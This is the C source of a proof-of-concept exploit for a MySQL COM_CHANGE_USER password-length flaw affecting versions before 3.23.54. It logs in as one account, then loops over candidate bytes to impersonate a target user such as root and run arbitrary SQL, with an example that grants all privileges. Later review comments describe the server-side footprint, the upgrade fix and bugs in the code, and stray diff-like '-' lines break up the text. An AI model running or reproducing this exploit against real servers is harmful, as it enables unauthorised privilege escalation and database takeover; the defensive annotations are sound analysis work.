/* MySQL < 3.23.54 COM_CHANGE_USER password length vuln hack :P
 *
 * Discovered by e-matters
 * Advisory: http://security.e-matters.de/advisories/042002.html
 *
 * Usage: mysqlhack "host" "valid_user" "valid_pass" "user_to_become" "sql_command_to_execute_as_user_to_become"
 * dreyer <dreyer@subdimension.com>
 * Version 0.1
 *
 * What you need:
 * A valid user that can log in from this host
 * The password for that user
 * A target user that can log in from this host (the SQL will be executed as this user)
 *
 * Compile: gcc -o mysqlhack mysqlhack.c -lmysqlclient
 * e.g.:
 * ./mysqlhack localhost user pass root "grant all privileges on *.* to 'user';"
 *
 * Greetings to: jaxp, kicat, and all people in #ngsec @ irc-hispano network
 */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <mysql/mysql.h>
-
-
-
/*
 * Proof-of-concept driver for the COM_CHANGE_USER password-length issue
 * named in the file header (MySQL < 3.23.54; the fix shipped in 3.23.54,
 * so upgrading is the mitigation).  It logs in normally as argv[2]/argv[3],
 * then loops over COM_CHANGE_USER packets naming argv[4] and, after each
 * one, tries to run argv[5].  A burst of COM_CHANGE_USER commands on one
 * already-authenticated connection, followed by a query, is the observable
 * footprint of this program on the server side.
 *
 * argv: host, user, pass, user_dest, sql_command (argc must be exactly 6).
 * Exit status: 0 if the query ran, 1 on usage or connection error; on the
 * "didn't succeed" path main falls off its end (0 under C99+, indeterminate
 * under C89).
 *
 * NOTE(review): memset/strcpy/strlen are called but <string.h> is not among
 * the includes above, so they are implicitly declared.
 */
int main(int argc, char **argv)
{
    MYSQL *sock,mysql;
    char abuf[200];      /* payload: "<user_dest>\0<byte>\0"; zeroed below */
    char *pass;          /* points at the byte right after the name's NUL */
    int result,i;        /* `result` is declared but never used */

    printf("[+] MySql <3.23.54 SUer by \033[1;33mdreyer@subdimension.com\033[0m\n");
    memset (abuf,0,sizeof(abuf));
    if (argc != 6)
    {
        fprintf(stderr,"usage : mysqlhack <host> <user> <pass> <user_dest> <sql_command>\n\n");
        exit(1);
    }

    printf("[+] Conecting...\n");
    mysql_init(&mysql);
    /* Ordinary, fully authenticated login as argv[2]; port 3306 is hard-coded. */
    if (!(sock = mysql_real_connect(&mysql,argv[1],argv[2],argv[3],NULL,3306,NULL,0)))
    {
        fprintf(stderr,"[-] Couldn't connect to engine!\n%s\n",mysql_error(&mysql));
        perror("");   /* errno is not necessarily meaningful after a client-library failure */
        exit(1);
    }
    printf("[+] Begining attack...\n");

    /* Unbounded copy: argv[4] is never length-checked against the 200-byte
     * abuf, and the packet below is sent as strlen(abuf)+3 bytes, so a long
     * argv[4] both overruns the buffer on write and reads past it on send. */
    strcpy(abuf,argv[4]);
    pass=abuf+strlen(abuf)+1;
    /* 33 iterations (i = 64..96), each placing one candidate byte after the
     * name.  net_clear/net_write_command/my_net_read and sock->net appear to
     * be libmysqlclient internals rather than the documented API, so this
     * only builds against client headers that still expose them. */
    for(i=64;i<97;i++) {
        *pass=i;
        net_clear(&sock->net);
        /* A send failure is only reported; the iteration continues regardless. */
        if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+3))
        {
            printf("[-] Can't send command to server.\n");
        }
        /* Likewise a read error is printed and then ignored. */
        if (my_net_read(&sock->net)==packet_error)
            printf("Packet Error\n");
        /* mysql_query() returns 0 on success, so this branch is the success path. */
        if(!mysql_query(sock,argv[5]))
        {
            printf("[+] Ok command executed '%s'\n",argv[5]);
            mysql_close(sock);
            exit(0);
        }
    }
    printf("[-] Sorry, attack didn't succeed\n");
    mysql_close(sock);
    /* No return statement here: see the exit-status note in the header comment. */
}
-